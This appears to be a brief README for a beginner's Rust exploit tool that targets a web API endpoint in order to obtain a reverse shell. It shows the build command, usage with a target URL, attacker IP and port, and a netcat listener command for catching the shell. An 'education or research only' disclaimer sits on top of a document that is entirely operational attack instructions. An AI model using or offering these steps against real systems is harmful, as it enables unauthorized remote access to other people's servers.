I'm rust noob so this code was my part of RustLang practices
Yes!!Let's Get the reverse shell!!!!!!!!!!
[!]for education or researching only
cargo build
./exploit <targetURL/path/of/api> <LHOST> <LPORT>
./exploit http://target.com/api/osinfo?param 172.17.2.1 1234
nc -nlvp <lport>
nc -nlvp 1234